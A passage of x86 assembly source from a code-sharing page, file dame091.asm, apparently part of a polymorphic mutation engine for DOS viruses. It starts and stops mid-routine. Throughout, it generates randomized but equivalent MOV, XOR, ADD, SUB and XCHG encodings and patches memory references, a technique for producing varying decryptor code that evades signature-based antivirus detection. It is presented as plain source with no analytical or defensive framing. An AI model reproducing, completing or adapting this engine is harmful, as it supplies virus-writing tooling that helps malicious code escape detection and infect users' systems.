?? dame091.asm
字號:
jmp short handle_jmp_table
_mov_reg_xxxx_mov_add:
call get_rand_bx ; Get a random number
push bx ; Save it
sub dx,bx ; Adjust MOV amount
call mov_reg_xxxx ; MOV to register
pop dx ; Get random number
jmp short go_add_reg_xxxx ; Add it to the register
_mov_reg_xxxx_mov_al_ah:
cmp al,_sp
jae _mov_reg_xxxx
push ax dx
call _mov_al_xx
pop dx ax
xchg dh,dl
jmp short _mov_ah_xx
_mov_reg_xxxx_mov_xor:
call get_rand_bx
push bx
xor dx,bx
call mov_reg_xxxx
pop dx
jmp xor_reg_xxxx
_mov_reg_xxxx_xor_add:
push dx
mov dx,ax
call xor_reg_reg
pop dx
go_add_reg_xxxx:
jmp add_reg_xxxx
_mov_reg_xxxx_mov_rol:
ror dx,1
call mov_reg_xxxx
jmp short _rol
_mov_reg_xxxx_mov_ror:
rol dx,1
call mov_reg_xxxx
_ror:
or al,8
_rol:
mov ah,0d1
jmp short go_mod_xxx_rm1
_mov_reg_xxxx:
call one_in_two ; 1/2 chance of a four byte MOV
js _mov_reg_xxxx1
add al,0B8
stosb
xchg ax,dx
stosw
ret
_mov_reg_xxxx1: ; Do the four byte register MOV
mov ah,0c7
jmp mod_xxx_rm_stosw
mov_ah_xx:
_mov_ah_xx:
add al,04
mov_al_xx:
_mov_al_xx:
add al,0B0
mov ah,dl
stosw
ret
mov_reg_reg: ; ax, dx preserved
mov si,offset mov_reg_reg_table
jmp short go_handle_jmp_table1
_mov_reg_reg_push_pop:
push ax
xchg dx,ax
call _push ; PUSH REG2
pop ax
jmp _pop ; POP REG1
_mov_reg_reg:
mov ah,08Bh
jmp short _mod_reg_rm_direction
mov_xchg_reg_reg:
call one_in_two
js mov_reg_reg
xchg_reg_reg: ; ax, dx preserved
mov si,offset xchg_reg_reg_table
go_handle_jmp_table2:
jmp short go_handle_jmp_table1
_xchg_reg_reg_push_pop:
push dx ax dx
call _push ; PUSH REG1
pop ax
call _push ; PUSH REG2
pop ax
call _pop ; POP REG1
pop ax
jmp _pop ; POP REG2
_xchg_reg_reg_3rd_reg:
call free_regs
jne _xchg_reg_reg
push dx ax
call get_another ; Get free register (reg3)
call mov_xchg_reg_reg ; MOV/XCHG REG3,REG2
pop dx
call xchg_reg_reg ; XCHG REG3,REG1
pop dx
xchg ax,dx
call mov_xchg_reg_reg ; MOV/XCHG REG2,REG3
jmp clear_reg_dx
_xchg_reg_reg:
or al,al
js __xchg_reg_reg
cmp al,dl
jg _xchg_reg_reg_skip
xchg al,dl
_xchg_reg_reg_skip:
or dl,dl
jz _xchg_ax_reg
__xchg_reg_reg:
xchg al,dl
mov ah,87
jmp short _mod_reg_rm
_xchg_ax_reg:
add al,90
stosb
ret
xor_reg_xxxx_xor_xor:
call get_rand_bx
push bx
xor dx,bx
call xor_reg_xxxx
pop dx
jmp short xor_reg_xxxx
xor_reg_xxxx:
mov si,offset xor_reg_xxxx_table
jmp short go_handle_jmp_table2
_xor_reg_xxxx:
or al,030
jmp _81h_
xor_reg_reg:
mov si,offset xor_reg_reg_table
go_handle_jmp_table3:
jmp short go_handle_jmp_table2
_xor_reg_reg:
mov ah,33
; The following is the master encoder. It handles most traditional encodings
; with mod/reg/rm or mod/xxx/rm.
_mod_reg_rm_direction:
or al,al ; If al is a memory pointer,
js dodirection ; then we need to swap regs
or dl,dl ; If dl is a memory pointer,
js _mod_reg_rm ; we cannot swap registers
call one_in_two ; Otherwise there is a 50%
js _mod_reg_rm ; chance of swapping registers
dodirection:
xchg al,dl ; Swap the registers and adjust
sub ah,2 ; the opcode to compensate
_mod_reg_rm:
shl al,1 ; Move al to the reg field
shl al,1
shl al,1
or al,dl ; Move dl to the rm field
mod_xxx_rm:
or al,al ; Is al a memory pointer?
js no_no_reg ; If so, skip next line
or al,0c0 ; Mark register in mod field
no_no_reg:
xchg ah,al
test ah,40
jnz exit_mod_reg_rm
test cl,1
jnz continue_mod_xxx_rm
push ax
mov al,2e
stosb
pop ax
continue_mod_xxx_rm:
stosw
mov si,cs:[bp] ; Store the patch location
add si,si ; for the memory in the
mov cs:[si+bp+2],di ; appropriate table for later
inc word ptr cs:[bp] ; adjustment
; cs: overrides needed for bp
mov al,_relocate_amt
cbw
exit_mod_reg_rm:
stosw
ret
add_reg_reg:
mov si,offset add_reg_reg_table
jmp short go_handle_jmp_table3
_add_reg_reg:
mov ah,3
jmp short _mod_reg_rm_direction
sub_reg_reg:
mov si,offset sub_reg_reg_table
go_handle_jmp_table4:
jmp short go_handle_jmp_table3
_sub_reg_reg:
mov ah,2bh
jmp short _mod_reg_rm_direction
_add_reg_xxxx_inc_add:
call inc_reg
dec dx
jmp short add_reg_xxxx
_add_reg_xxxx_dec_add:
call dec_reg
inc dx
jmp short add_reg_xxxx
_add_reg_xxxx_add_add:
call get_rand_bx
push bx
sub dx,bx
call add_reg_xxxx
pop dx
jmp short add_reg_xxxx
add_reg_xxxx1:
neg dx
add_reg_xxxx:
or dx,dx
jnz cont
return1:
ret
cont:
mov si,offset add_reg_xxxx_table
jmp go_handle_jmp_table4
_add_reg_xxxx:
or al,al
jz _add_ax_xxxx
_81h_:
or al,al
js __81h
add al,0c0
__81h:
mov ah,81
mod_xxx_rm_stosw:
call mod_xxx_rm
_encode_dx_:
xchg ax,dx
stosw
ret
_add_ax_xxxx:
mov al,5
_encode_al_dx_:
stosb
jmp short _encode_dx_
sub_reg_xxxx1:
neg dx
sub_reg_xxxx:
_sub_reg_xxxx:
or dx,dx ; SUBtracting anything?
jz return1 ; If not, we are done
or al,al ; SUB AX, XXXX?
jz _sub_ax_xxxx ; If so, we encode in 3 bytes
add al,028 ; Otherwise do the standard
jmp short _81h_ ; mod/reg/rm deal
_sub_ax_xxxx:
mov al,2dh
jmp short _encode_al_dx_
dec_reg:
push ax
add al,8
jmp short _dec_inc_reg
inc_reg:
push ax
_dec_inc_reg:
or al,al
jns _norm_inc
mov ah,0ff
call mod_xxx_rm
pop ax
ret
_norm_inc:
add al,40
stosb
pop ax
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -